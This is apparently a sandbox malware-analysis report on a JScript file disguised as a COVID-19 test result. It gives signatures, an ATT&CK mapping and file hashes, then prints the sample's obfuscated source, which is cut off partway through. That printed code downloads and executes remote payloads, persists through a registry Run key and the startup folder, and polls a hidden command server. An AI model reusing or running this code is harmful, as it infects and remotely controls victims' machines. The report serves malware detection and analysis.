Play interactive tour
Edit tourAnalysis Report COVID_19_Test_Result_Doctor_Note.js
Overview
General Information
| Sample Name: | COVID_19_Test_Result_Doctor_Note.js |
| Analysis ID: | 365159 |
| MD5: | 0bca3422ec870f28791d61a4fa25367f |
| SHA1: | 36352478af11cdd59c55b8ef8ecf2cfacb2dcaaa |
| SHA256: | 7703889f1b2c6fd8a1fe0abc4a8b6a409d4e6eabe5943c4a5261dfc68fb973f6 |
| Infos: | |
Most interesting Screenshot:  | |
Detection
| Score: | 52 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Found potential dummy code loops (likely to delay analysis)
JavaScript source code contains call to eval() to check own source code (likely for evading instrumentation)
Potential obfuscated javascript found
Abnormal high CPU Usage
Found WSH timer for Javascript or VBS script (likely evasive script)
Java / VBScript file with very long strings (likely obfuscated code)
Program does not show much activity (idle)
Classification
Startup |
|---|
|
Malware Configuration |
|---|
| No configs have been found |
|---|
Yara Overview |
|---|
| No yara matches |
|---|
Sigma Overview |
|---|
| No Sigma rule has matched |
|---|
Signature Overview |
|---|
Click to jump to signature section
Show All Signature Results
| Source: | Process Stats: | ||
| Source: | Initial sample: | ||
| Source: | Classification label: | ||
| Source: | Key opened: | Jump to behavior | ||
| Source: | Key value queried: | Jump to behavior | ||
Data Obfuscation: |   |
|---|
| Potential obfuscated javascript found | Show sources | ||
| Source: | Initial file: | ||
| Source: | Process information set: | Jump to behavior | ||
| Source: | Process information set: | Jump to behavior | ||
Malware Analysis System Evasion: | |
|---|
| JavaScript source code contains call to eval() to check own source code (likely for evading instrumentation) | Show sources | ||
| Source: | Check function source code vs Regexp: | Go to definition | ||
| Source: | Window found: | Jump to behavior | ||
| Source: | Thread injection, dropped files, key value created, disk infection and DNS query: | ||
Anti Debugging: | |
|---|
| Found potential dummy code loops (likely to delay analysis) | Show sources | ||
| Source: | Process Stats: | ||
| Source: | Thread injection, dropped files, key value created, disk infection and DNS query: | ||
| Source: | Key value queried: | Jump to behavior | ||
Mitre Att&ck Matrix |
|---|
| Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Valid Accounts | Scripting22 | Path Interception | Path Interception | Virtualization/Sandbox Evasion11 | OS Credential Dumping | Security Software Discovery2 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Data Obfuscation | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
| Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Scripting22 | LSASS Memory | Virtualization/Sandbox Evasion11 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Junk Data | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
| Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information1 | Security Account Manager | System Information Discovery2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Behavior Graph |
|---|
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
InternetScreenshots |
|---|
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Antivirus, Machine Learning and Genetic Malware Detection |
|---|
Initial Sample |
|---|
| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| 0% | Virustotal | Browse |
Dropped Files |
|---|
| No Antivirus matches |
|---|
Unpacked PE Files |
|---|
| No Antivirus matches |
|---|
Domains |
|---|
| No Antivirus matches |
|---|
URLs |
|---|
| No Antivirus matches |
|---|
Domains and IPs |
|---|
General Information |
|---|
| Joe Sandbox Version: | 31.0.0 Emerald |
| Analysis ID: | 365159 |
| Start date: | 09.03.2021 |
| Start time: | 09:12:25 |
| Joe Sandbox Product: | CloudBasic |
| Overall analysis duration: | 0h 6m 9s |
| Hypervisor based Inspection enabled: | false |
| Report type: | full |
| Sample file name: | COVID_19_Test_Result_Doctor_Note.js |
| Cookbook file name: | default.jbs |
| Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
| Number of analysed new started processes analysed: | 27 |
| Number of new started drivers analysed: | 0 |
| Number of existing processes analysed: | 0 |
| Number of existing drivers analysed: | 0 |
| Number of injected processes analysed: | 0 |
| Technologies: |
|
| Analysis Mode: | default |
| Analysis stop reason: | Timeout |
| Detection: | MAL |
| Classification: | mal52.evad.winJS@1/0@0/0 |
| EGA Information: | Failed |
| HDC Information: | Failed |
| HCA Information: |
|
| Cookbook Comments: |
|
| Warnings: | Show All
|
Simulations |
|---|
Behavior and APIs |
|---|
| No simulations |
|---|
Joe Sandbox View / Context |
|---|
Created / dropped Files |
|---|
| No created / dropped files found |
|---|
Static File Info |
|---|
General | |
|---|---|
| File type: | |
| Entropy (8bit): | 5.728503884778436 |
| TrID: |
|
| File name: | COVID_19_Test_Result_Doctor_Note.js |
| File size: | 13478 |
| MD5: | 0bca3422ec870f28791d61a4fa25367f |
| SHA1: | 36352478af11cdd59c55b8ef8ecf2cfacb2dcaaa |
| SHA256: | 7703889f1b2c6fd8a1fe0abc4a8b6a409d4e6eabe5943c4a5261dfc68fb973f6 |
| SHA512: | bcaeb9faad34f88a8a7392743a8d71eb793eb865f17c3b2232ddb28066a5959e14f476dcffd26901a79e3cf1b8cee05deb96e06d9da6693b7958d1b3915d92d3 |
| SSDEEP: | 384:90DjR41HSTJwGFP4NK4lKm5+tbK4vgDDr843x7z/RjozIFY:9ajy1yT1FP4NnlKztbnMDr8uxnRjAIFY |
| File Content Preview: | //***ERROR DECODING SIGNATURE FOR PATIENT ***//..//***ERROR OUTPUT***//....var _0x39e5=['mCozt8kWW4eQEG','CNvU','W53dQmk9cmoWC0Krl3y','mZq2odK1DNLpAwXg','u2W2ymoJWQCPW5C','DgvZDa','rxHWyw5Krw52AxjVBM1LBNrtDhjPBMDZ','mty2mZe2u0DUq1z3','mJG4odi0q0HOAfbJ','y |
File Icon |
|---|
 | |
| Icon Hash: | e8d69ece968a9ec4 |
Key Decision
Richest Path
Thread / callback creation
Lower opacity -> Library NodeNetwork Behavior |
|---|
| No network behavior found |
|---|
Code Manipulations |
|---|
Statistics |
|---|
CPU Usage |
|---|
Click to jump to process
Memory Usage |
|---|
Click to jump to process
High Level Behavior Distribution |
|---|
back
Click to dive into process behavior distribution
System Behavior |
|---|
General |
|---|
| Start time: | 09:13:10 |
| Start date: | 09/03/2021 |
| Path: | C:\Windows\System32\wscript.exe |
| Wow64 process (32bit): | false |
| Commandline: | |
| Imagebase: | 0x7ff7deb40000 |
| File size: | 163840 bytes |
| MD5 hash: | 9A68ADD12EB50DDE7586782C3EB9FF9C |
| Has elevated privileges: | true |
| Has administrator privileges: | true |
| Programmed in: | C, C++ or other language |
| Reputation: | high |
Disassembly |
|---|
Code Analysis |
|---|
Call Graph |
|---|
Graph
- Executed
- Not Executed
Script: |
|---|
Code | ||
|---|---|---|
| 0 | var _0x39e5 = [ 'mCozt8kWW4eQEG', 'CNvU', 'W53dQmk9cmoWC0Krl3y', 'mZq2odK1DNLpAwXg', 'u2W2ymoJWQCPW5C', 'DgvZDa', 'rxHWyw5Krw52AxjVBM1LBNrtDhjPBMDZ', 'mty2mZe2u0DUq1z3', 'mJG4odi0q0HOAfbJ', 'ybpdShBdI8o/mdvSWRTG', 'jvrftvaL', 'WPRcJSk5WPdcPCksmSkyW6BdJComW4u9vG', 'C2vUza', 'WRhdVmoDc8o3W5zo', 'y2HHCKf0', 'WORcKCkSWORcQSkAmSkB', 'F8kLW40M', 'vxnLCI1bz2vUDa', 'z3zcW5FcVCoOECkBW6xcQCk2gI3dG01L', 'Aw5WDxq', 'CxvPDa', 'cSkTdmoA', 'W7KoWRlcQvpdOmkku8k7cNObb8o6W5fGWPNcImkfW4OKgCofzG', 'D3nJCMLWDc5LEguGlY9cia', 'uMvNuMvHza', 'W5xcRHpcMmooWR9jWPWvts8', 'B3bLBG', 'BgvUz3rO', 'WO1dAhxcSW', 'ytL3WP/cK8oHWO12beqi', 'zNjVBunOyxjdB2rL', 'WPKBohVcU8ohW7azW7eXWO0', 'WR0GW7ddVSoUW7uObfhdHCoZWQn3W4/cRYHAW5VcKCkkW5SFafagWQfiFCkMA8k1W4BdNHpcLCoDrLJdVSkYWPxcGZRcPgS', 'tw96AwXSys81lJaGkfDPBMrVD3mGtLqGmtaUmdSGv2LUnJq7ihG2ncKGqxbWBgvxzwjlAxqVntm3lJm2icHlsfrntcWGBgLRzsbhzwnRBYKGq2HYB21LlZG4lJaUndmYnc4XntaGu2fMyxjPlZuZnY4ZnIbfzgCVodGUmc43mduUnJm', 'ftRdKq3dNa', 'W4DpyI/dTSow', 'C3rHCNr1Ca', 'otG4mdDgB1b2ueW', 'WO7dVW3dSZtcUq', 'g8ocieBdPCkMWQ17tmkSpG', 'uKvhx1nA', 'y2fSBa', 'hSk6bCobBW', 'cx3dQCkHsZq', 'WRRdVmohomoQW5m', 'WOtdP8klaSo5mSkyoK/dJqi6', 'mteYnJqZt1PHveHh', 'hSkPg8obAWKhW7uItW', 'C2nYAxb0BMfTzq', 'W4PAFctdUW', 'i2iWW4BdLCorWRLXj0m', 'CMvND3jPDgu', 'WOlcRCo0eCoF', 'tvnytuWYlLnLCNzLCLHnteHuvfa', 'Aw5PDa', 'y2HHAw4', 'ywjJzgvMmdeYmZq1nJC4oq', 'W5FcVSorrCo1', 'CMvWBgfJzq', 'ac/dKHu', 'WONdTsTzvCo6jxq', 'oI8V', 'C2nYAxb0zNvSBg5HBwu', 'CMvZCg9UC2vuzxH0', 'q29UDgvUDc1uExbL', 'gNmZW5WpxMj6tG', 'W4NcPW9HDCoalNyWwSodvq', 'W5hdR1G', 'leSr', 'zgvIDq', 'seTdvvXtB2z0D2fYzvXIB2X0xeDvsuq', 'ue9tva', 'jvvtrvjoqu1fjq', 'W4ZdKSoYes/dTCkXWRXTWRGD', 'y29UC3rYDwn0B3i', 'C3bSAxq', 'sSkNW48qWQ/dGmosp8kO', 'muPSufz4sa', 'W6tdI2iVlY8', 'W7btwSoMWPNcICogncecEmk3', 'W6BdGmkmnmoCDeGwnMtcPrxdM8osag7dRGTkW6/cLt0+W5/cIgdcKHK+fx/cRmkFrL3cRwldRtxcLSoGECo3ggxcIrdcUmo4WPtcGG', 'C2f2zxrVzMLSzq', 'WRihhmkcW4JdI8o8cZmIEmkvWO3cRrBdLq', 'yxbWBgLJyxrPB24VEc13D3CTzM9YBs11CMXLBMnVzgvK', 'oLZdQfSSDW', 'D3nJCMLWDc5ZAgvSBa', 'zMXVB3i', 'WP7cJmk1WOFcQq', 'xNXUkSkbWPmC', 'z2PaW5hcUSkU', 'W6CdlYOiW7XHps3dUmk8W7S' ]; | |
| 1 | var _0x26ae = function (_0x2929da, _0x18bd1c) { | |
| 2 | _0x2929da = _0x2929da - 0x136; | |
| 3 | var _0x387f06 = _0x39e5[_0x2929da]; | |
| 4 | if ( _0x26ae['wkROjH'] === undefined ) | |
| 5 | { | |
| 6 | var _0x2150f9 = function (_0x5a8350) { | |
| 7 | var _0x494982 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/='; | |
| 8 | var _0x39e5e0 = ''; | |
| 9 | for ( var _0x26ae68 = 0x0, _0x1fc186, _0x4ab90f, _0x3e72fb = 0x0 ; _0x4ab90f = _0x5a8350['charAt'] ( _0x3e72fb ++ ) ; ~ _0x4ab90f && ( _0x1fc186 = _0x26ae68 % 0x4 ? _0x1fc186 * 0x40 + _0x4ab90f : _0x4ab90f, _0x26ae68 ++ % 0x4 ) ? _0x39e5e0 += String['fromCharCode'] ( 0xff & _0x1fc186 >> ( - 0x2 * _0x26ae68 & 0x6 ) ) : 0x0 ) | |
| 10 | { | |
| 11 | _0x4ab90f = _0x494982['indexOf'] ( _0x4ab90f ); | |
| 12 | } | |
| 13 | return _0x39e5e0; | |
| 14 | }; | |
| 15 | _0x26ae['xYSHEi'] = | |
| 16 | function (_0x2a30ac) { | |
| 17 | var _0x2d8802 = _0x2150f9 ( _0x2a30ac ); | |
| 18 | var _0x40f67c = []; | |
| 19 | for ( var _0x2d6e36 = 0x0, _0x39a245 = _0x2d8802['length'] ; _0x2d6e36 < _0x39a245 ; _0x2d6e36 ++ ) | |
| 20 | { | |
| 21 | _0x40f67c += '%' + ( '00' + _0x2d8802['charCodeAt'] ( _0x2d6e36 ) ['toString'] ( 0x10 ) )['slice'] ( - 0x2 ); | |
| 22 | } | |
| 23 | return decodeURIComponent ( _0x40f67c ); | |
| 24 | }, | |
| 25 | _0x26ae['DaINLR'] = | |
| 26 | { | |
| 27 | }, _0x26ae['wkROjH'] = ! ! []; | |
| 28 | } | |
| 29 | var _0x2c1167 = _0x39e5[0x0], _0x30f503 = _0x2929da + _0x2c1167, _0x38ac6c = _0x26ae['DaINLR'][_0x30f503]; | |
| 30 | if ( _0x38ac6c === undefined ) | |
| 31 | { | |
| 32 | var _0x364960 = function (_0x41273d) { |
|
| 33 | this['FJMtUj'] = _0x41273d, this['PRTrKK'] = [ 0x1, 0x0, 0x0 ], | |
| 34 | this['lcaTHf'] = | |
| 35 | function () { | |
| 36 | return 'newState'; | |
| 37 | }, this['NiMMBI'] = '\x5cw+\x20*\x5c(\x5c)\x20*{\x5cw+\x20*', this['KKqzjK'] = '[\x27|\x22].+[\x27|\x22];?\x20*}'; | |
| 38 | }; | |
| 39 | _0x364960['prototype']['dAYrWi'] = | |
| 40 | function () { | |
| 41 | var _0x43f378 = new RegExp ( this['NiMMBI'] + this['KKqzjK'] ), _0x34b6d1 = _0x43f378['test'] ( this['lcaTHf']['toString'] ( ) ) ? -- this['PRTrKK'][0x1] : -- this['PRTrKK'][0x0]; |
|
| 42 | return this['lLjveu'] ( _0x34b6d1 ); |
|
| 43 | }, | |
| 44 | _0x364960['prototype']['lLjveu'] = | |
| 45 | function (_0x4d31de) { |
|
| 46 | if ( ! Boolean ( ~ _0x4d31de ) ) |
|
| 47 | return _0x4d31de; | |
| 48 | return this['xyNHXg'] ( this['FJMtUj'] ); |
|
| 49 | }, | |
| 50 | _0x364960['prototype']['xyNHXg'] = | |
| 51 | function (_0x553279) { |
|
| 52 | for ( var _0x3534fb = 0x0, _0x3c82a3 = this['PRTrKK']['length'] ; _0x3534fb < _0x3c82a3 ; _0x3534fb ++ ) | |
| 53 | { | |
| 54 | this['PRTrKK']['push'] ( Math['round'] ( Math['random'] ( ) ) ), _0x3c82a3 = this['PRTrKK']['length']; |
|
| 55 | } | |
| 56 | return _0x553279 ( this['PRTrKK'][0x0] ); | |
| 57 | }, new _0x364960 ( _0x26ae ) ['dAYrWi'] ( ), _0x387f06 = _0x26ae['xYSHEi'] ( _0x387f06 ), _0x26ae['DaINLR'][_0x30f503] = _0x387f06; | |
| 58 | } | |
| 59 | else | |
| 60 | _0x387f06 = _0x38ac6c; | |
| 61 | return _0x387f06; | |
| 62 | }; | |
| 63 | var _0x1fc1 = function (_0x2929da, _0x18bd1c) { | |
| 64 | _0x2929da = _0x2929da - 0x136; | |
| 65 | var _0x387f06 = _0x39e5[_0x2929da]; | |
| 66 | if ( _0x1fc1['APyrWQ'] === undefined ) | |
| 67 | { | |
| 68 | var _0x2150f9 = function (_0x494982) { | |
| 69 | var _0x39e5e0 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/='; | |
| 70 | var _0x26ae68 = ''; | |
| 71 | for ( var _0x1fc186 = 0x0, _0x4ab90f, _0x3e72fb, _0x2a30ac = 0x0 ; _0x3e72fb = _0x494982['charAt'] ( _0x2a30ac ++ ) ; ~ _0x3e72fb && ( _0x4ab90f = _0x1fc186 % 0x4 ? _0x4ab90f * 0x40 + _0x3e72fb : _0x3e72fb, _0x1fc186 ++ % 0x4 ) ? _0x26ae68 += String['fromCharCode'] ( 0xff & _0x4ab90f >> ( - 0x2 * _0x1fc186 & 0x6 ) ) : 0x0 ) | |
| 72 | { | |
| 73 | _0x3e72fb = _0x39e5e0['indexOf'] ( _0x3e72fb ); | |
| 74 | } | |
| 75 | return _0x26ae68; | |
| 76 | }; | |
| 77 | var _0x5a8350 = function (_0x2d8802, _0x40f67c) { | |
| 78 | var _0x2d6e36 = [], _0x39a245 = 0x0, _0x364960, _0x41273d = '', _0x43f378 = ''; | |
| 79 | _0x2d8802 = _0x2150f9 ( _0x2d8802 ); | |
| 80 | for ( var _0x4d31de = 0x0, _0x553279 = _0x2d8802['length'] ; _0x4d31de < _0x553279 ; _0x4d31de ++ ) | |
| 81 | { | |
| 82 | _0x43f378 += '%' + ( '00' + _0x2d8802['charCodeAt'] ( _0x4d31de ) ['toString'] ( 0x10 ) )['slice'] ( - 0x2 ); | |
| 83 | } | |
| 84 | _0x2d8802 = decodeURIComponent ( _0x43f378 ); | |
| 85 | var _0x34b6d1; | |
| 86 | for ( _0x34b6d1 = 0x0 ; _0x34b6d1 < 0x100 ; _0x34b6d1 ++ ) | |
| 87 | { | |
| 88 | _0x2d6e36[_0x34b6d1] = _0x34b6d1; | |
| 89 | } | |
| 90 | for ( _0x34b6d1 = 0x0 ; _0x34b6d1 < 0x100 ; _0x34b6d1 ++ ) | |
| 91 | { | |
| 92 | _0x39a245 = ( _0x39a245 + _0x2d6e36[_0x34b6d1] + _0x40f67c['charCodeAt'] ( _0x34b6d1 % _0x40f67c['length'] ) ) % 0x100, _0x364960 = _0x2d6e36[_0x34b6d1], _0x2d6e36[_0x34b6d1] = _0x2d6e36[_0x39a245], _0x2d6e36[_0x39a245] = _0x364960; | |
| 93 | } | |
| 94 | _0x34b6d1 = 0x0, _0x39a245 = 0x0; | |
| 95 | for ( var _0x3534fb = 0x0 ; _0x3534fb < _0x2d8802['length'] ; _0x3534fb ++ ) | |
| 96 | { | |
| 97 | _0x34b6d1 = ( _0x34b6d1 + 0x1 ) % 0x100, _0x39a245 = ( _0x39a245 + _0x2d6e36[_0x34b6d1] ) % 0x100, _0x364960 = _0x2d6e36[_0x34b6d1], _0x2d6e36[_0x34b6d1] = _0x2d6e36[_0x39a245], _0x2d6e36[_0x39a245] = _0x364960, _0x41273d += String['fromCharCode'] ( _0x2d8802['charCodeAt'] ( _0x3534fb ) ^ _0x2d6e36[( _0x2d6e36[_0x34b6d1] + _0x2d6e36[_0x39a245] ) % 0x100] ); | |
| 98 | } | |
| 99 | return _0x41273d; | |
| 100 | }; | |
| 101 | _0x1fc1['xeclEU'] = _0x5a8350, | |
| 102 | _0x1fc1['tEpTFs'] = | |
| 103 | { | |
| 104 | }, _0x1fc1['APyrWQ'] = ! ! []; | |
| 105 | } | |
| 106 | var _0x2c1167 = _0x39e5[0x0], _0x30f503 = _0x2929da + _0x2c1167, _0x38ac6c = _0x1fc1['tEpTFs'][_0x30f503]; | |
| 107 | if ( _0x38ac6c === undefined ) | |
| 108 | { | |
| 109 | if ( _0x1fc1['gqdguA'] === undefined ) | |
| 110 | { | |
| 111 | var _0x3c82a3 = function (_0x2cc4e4) { | |
| 112 | this['dFGFPT'] = _0x2cc4e4, this['erFzXo'] = [ 0x1, 0x0, 0x0 ], | |
| 113 | this['KtfqmL'] = | |
| 114 | function () { | |
| 115 | return 'newState'; | |
| 116 | }, this['zGDTQe'] = '\x5cw+\x20*\x5c(\x5c)\x20*{\x5cw+\x20*', this['HjrHjW'] = '[\x27|\x22].+[\x27|\x22];?\x20*}'; | |
| 117 | }; | |
| 118 | _0x3c82a3['prototype']['NiMncb'] = | |
| 119 | function () { | |
| 120 | var _0x1ea5df = new RegExp ( this['zGDTQe'] + this['HjrHjW'] ), _0x3d06b9 = _0x1ea5df['test'] ( this['KtfqmL']['toString'] ( ) ) ? -- this['erFzXo'][0x1] : -- this['erFzXo'][0x0]; | |
| 121 | return this['rKZMXc'] ( _0x3d06b9 ); | |
| 122 | }, | |
| 123 | _0x3c82a3['prototype']['rKZMXc'] = | |
| 124 | function (_0x415288) { | |
| 125 | if ( ! Boolean ( ~ _0x415288 ) ) | |
| 126 | return _0x415288; | |
| 127 | return this['gTYFtX'] ( this['dFGFPT'] ); | |
| 128 | }, | |
| 129 | _0x3c82a3['prototype']['gTYFtX'] = | |
| 130 | function (_0x477ace) { | |
| 131 | for ( var _0x115c69 = 0x0, _0x3fb45b = this['erFzXo']['length'] ; _0x115c69 < _0x3fb45b ; _0x115c69 ++ ) | |
| 132 | { | |
| 133 | this['erFzXo']['push'] ( Math['round'] ( Math['random'] ( ) ) ), _0x3fb45b = this['erFzXo']['length']; | |
| 134 | } | |
| 135 | return _0x477ace ( this['erFzXo'][0x0] ); | |
| 136 | }, new _0x3c82a3 ( _0x1fc1 ) ['NiMncb'] ( ), _0x1fc1['gqdguA'] = ! ! []; | |
| 137 | } | |
| 138 | _0x387f06 = _0x1fc1['xeclEU'] ( _0x387f06, _0x18bd1c ), _0x1fc1['tEpTFs'][_0x30f503] = _0x387f06; | |
| 139 | } | |
| 140 | else | |
| 141 | _0x387f06 = _0x38ac6c; | |
| 142 | return _0x387f06; | |
| 143 | }; | |
| 144 | var _0x4f83db = _0x1fc1, _0x5abc4a = _0x26ae; | |
| 145 | ( function (_0x21ce3b, _0x4d5b36) { |
|
| 146 | var _0x3ba741 = _0x1fc1, _0x37524d = _0x26ae; | |
| 147 | while (! ! [ ] ) | |
| 148 | { | |
| 149 | try | |
| 150 | { | |
| 151 | var _0x469b11 = - parseInt ( _0x37524d ( '0x18d' ) ) + - parseInt ( _0x37524d ( 0x154 ) ) + parseInt ( _0x3ba741 ( 0x189, '01)r' ) ) + - parseInt ( _0x3ba741 ( 0x14e, 'DH)J' ) ) * parseInt ( _0x3ba741 ( 0x18a, '^Bvv' ) ) + - parseInt ( _0x37524d ( 0x15d ) ) * parseInt ( _0x37524d ( '0x17c' ) ) + parseInt ( _0x37524d ( '0x136' ) ) + - parseInt ( _0x3ba741 ( 0x14c, '$G#%' ) ) * - parseInt ( _0x3ba741 ( 0x18e, 'OvA7' ) ); |
|
| 152 | if ( _0x469b11 === _0x4d5b36 ) | |
| 153 | break ; | |
| 154 | else | |
| 155 | _0x21ce3b['push'] ( _0x21ce3b['shift'] ( ) ); | |
| 156 | } | |
| 157 | catch ( _0x4718c2 ) | |
| 158 | { | |
| 159 | _0x21ce3b['push'] ( _0x21ce3b['shift'] ( ) ); | |
| 160 | } | |
| 161 | } | |
| 162 | } ( _0x39e5, 0x469ee ) ); | |
| 163 | var SaveSettings = _0x5abc4a ( 0x175 ), shellobj = new ActiveXObject ( _0x5abc4a ( '0x184' ) ), filesystemobj = new ActiveXObject ( 'scripting.filesystemobject' ), HKCU = _0x4f83db ( 0x17f, '[mYd' ), startup = shellobj[_0x4f83db ( 0x13a, '^EhX' ) ] ( _0x5abc4a ( 0x153 ) ) + '\x5c', installdir = shellobj['expandenvironmentstrings'] ( _0x4f83db ( 0x170, '#LM8' ) ) + '\x5c', temp = shellobj[_0x5abc4a ( 0x190 ) ] ( _0x5abc4a ( '0x139' ) ) + '\x5c', gate = _0x4f83db ( '0x14f', 'v3Qe' ), user_agent = _0x5abc4a ( '0x150' ), time = 0xea60; | |
| 164 | do | |
| 165 | { | |
| 166 | install ( ), getCommand ( ), sleep ( time ); | |
| 167 | } | |
| 168 | while( ! ! [ ] ) | |
| 169 | function Download_exec(_0x4ab90f, _0x3e72fb) { | |
| 170 | var _0x1071d9 = _0x4f83db, _0xbf514b = _0x5abc4a; | |
| 171 | if ( _0x4ab90f['indexOf'] ( _0xbf514b ( '0x16c' ) ) < 0x0 ) | |
| 172 | var _0x2a30ac = gate[_0xbf514b ( '0x17a' ) ] ( '/' ), _0x4ab90f = gate[_0xbf514b ( 0x169 ) ] ( _0x2a30ac[_0x2a30ac['length'] - 0x1], _0x1071d9 ( 0x188, '9fc#' ) + _0x4ab90f ); | |
| 173 | var _0x2d8802 = new ActiveXObject ( 'Microsoft.XMLHTTP' ), _0x40f67c = new ActiveXObject ( 'ADODB.Stream' ); | |
| 174 | if ( _0x3e72fb == 0x1 ) | |
| 175 | var _0x2d6e36 = WSH[_0xbf514b ( 0x16d ) ]; | |
| 176 | else | |
| 177 | { | |
| 178 | var _0x39a245 = _0x4ab90f[_0x1071d9 ( '0x155', 'C^uH' ) ] ( _0x4ab90f[_0x1071d9 ( '0x15b', 'tSe#' ) ] - 0x4, _0x4ab90f[_0xbf514b ( '0x14a' ) ] ), _0x364960 = '', _0x41273d = _0xbf514b ( '0x167' ), _0x43f378 = _0x41273d[_0xbf514b ( 0x14a ) ]; | |
| 179 | for ( var _0x34b6d1 = 0x0 ; _0x34b6d1 < 0x8 ; _0x34b6d1 ++ ) | |
| 180 | { | |
| 181 | _0x364960 += _0x41273d[_0xbf514b ( 0x13d ) ] ( Math[_0xbf514b ( 0x185 ) ] ( Math[_0x1071d9 ( '0x17d', '874s' ) ] ( ) * _0x43f378 ) ); | |
| 182 | } | |
| 183 | var _0x2d6e36 = temp + _0x364960 + _0x39a245; | |
| 184 | } | |
| 185 | _0x2d8802[_0xbf514b ( 0x149 ) ] ( _0x1071d9 ( 0x172, '874s' ), _0x4ab90f, ! [] ), _0x2d8802[_0xbf514b ( '0x13b' ) ] ( ), _0x40f67c['type'] = 0x1, _0x40f67c[_0xbf514b ( '0x149' ) ], _0x40f67c[_0x1071d9 ( 0x186, '^EhX' ) ] ( _0x2d8802[_0x1071d9 ( 0x171, 'vnI1' ) ] ), _0x40f67c[_0xbf514b ( '0x180' ) ] ( _0x2d6e36, 0x2 ); | |
| 186 | try | |
| 187 | { | |
| 188 | shellobj[_0xbf514b ( '0x18b' ) ] ( _0x2d6e36 ); | |
| 189 | } | |
| 190 | catch ( _0x4d31de ) | |
| 191 | { | |
| 192 | } | |
| 193 | } | |
| 194 | function install() { | |
| 195 | var _0x2ca4f5 = _0x4f83db, _0x22499d = _0x5abc4a, _0x553279 = _0x22499d ( 0x146 ); | |
| 196 | try | |
| 197 | { | |
| 198 | shellobj[_0x22499d ( 0x162 ) ] ( HKCU + WSH[_0x22499d ( '0x15f' ) ][_0x2ca4f5 ( 0x159, 'ySE2' ) ] ( '.' ) [0x0], _0x553279 + String[_0x22499d ( 0x14d ) ] ( 0x22 ) + installdir + WSH[_0x2ca4f5 ( 0x18c, '[mYd' ) ] + String['fromCharCode'] ( 0x22 ), _0x22499d ( 0x157 ) ), filesystemobj[_0x2ca4f5 ( 0x13e, '^EhX' ) ] ( WSH['scriptfullname'], installdir + WSH[_0x22499d ( 0x15f ) ], ! ! [] ), filesystemobj['copyfile'] ( WSH[_0x22499d ( '0x16d' ) ], startup + WSH[_0x2ca4f5 ( 0x15e, 'ySE2' ) ], ! ! [] ); | |
| 199 | } | |
| 200 | catch ( _0x3534fb ) | |
| 201 | { | |
| 202 | } | |
| 203 | } | |
| 204 | function getCommand() { | |
| 205 | var _0x373146 = _0x4f83db, _0x22eae4 = _0x5abc4a, | |
| 206 | _0x3c82a3 = function () { | |
| 207 | var _0x4e8d66 = ! ! []; | |
| 208 | return function (_0xd91065, _0x49581c) { | |
| 209 | var _0x6890f8 = _0x4e8d66 ? | |
| 210 | function () { | |
| 211 | var _0x31a666 = _0x1fc1; | |
| 212 | if ( _0x49581c ) | |
| 213 | { | |
| 214 | var _0x2c2df6 = _0x49581c[_0x31a666 ( 0x160, 'DH)J' ) ] ( _0xd91065, arguments ); | |
| 215 | return _0x49581c = null, _0x2c2df6; | |
| 216 | } | |
| 217 | } : | |
| 218 | function () { | |
| 219 | }; | |
| 220 | return _0x4e8d66 = ! [], _0x6890f8; | |
| 221 | }; | |
| 222 | } ( ), | |
| 223 | _0x2cc4e4 = _0x3c82a3 ( this, | |
| 224 | function () { | |
| 225 | var _0x165709 = function () { | |
| 226 | var _0x4e308a = _0x1fc1, _0x50e1a3 = _0x26ae, _0x4f1543 = _0x165709[_0x50e1a3 ( '0x179' ) ] ( 'return\x20/\x22\x20+\x20this\x20+\x20\x22/' ) ( ) [_0x4e308a ( '0x148', 'Fq[d' ) ] ( _0x4e308a ( 0x145, 'hIr#' ) ); | |
| 227 | return ! _0x4f1543[_0x4e308a ( '0x16a', '2kiA' ) ] ( _0x2cc4e4 ); | |
| 228 | }; | |
| 229 | return _0x165709 ( ); | |
| 230 | } ) ; | |
| 231 | _0x2cc4e4 ( ); | |
| 232 | var _0x1ea5df = function () { | |
| 233 | var _0x14436f = ! ! []; | |
| 234 | return function (_0x5126a2, _0xc5637) { | |
| 235 | var _0xe720db = _0x14436f ? | |
| 236 | function () { | |
| 237 | if ( _0xc5637 ) | |
| 238 | { | |
| 239 | var _0x3e456b = _0xc5637['apply'] ( _0x5126a2, arguments ); | |
| 240 | return _0xc5637 = null, _0x3e456b; | |
| 241 | } | |
| 242 | } : | |
| 243 | function () { | |
| 244 | }; | |
| 245 | return _0x14436f = ! [], _0xe720db; | |
| 246 | }; | |
| 247 | } ( ); | |
| 248 | ( function () { | |
| 249 | _0x1ea5df ( this, | |
| 250 | function () { | |
| 251 | var _0x5b1a0b = _0x26ae, _0x5f0503 = _0x1fc1, _0x522cd6 = new RegExp ( _0x5f0503 ( '0x141', '9fc#' ) ), _0x82cad1 = new RegExp ( '\x5c+\x5c+\x20*(?:[a-zA-Z_$][0-9a-zA-Z_$]*)', 'i' ), _0x4ff68c = _0x2150f9 ( _0x5b1a0b ( 0x165 ) ); | |
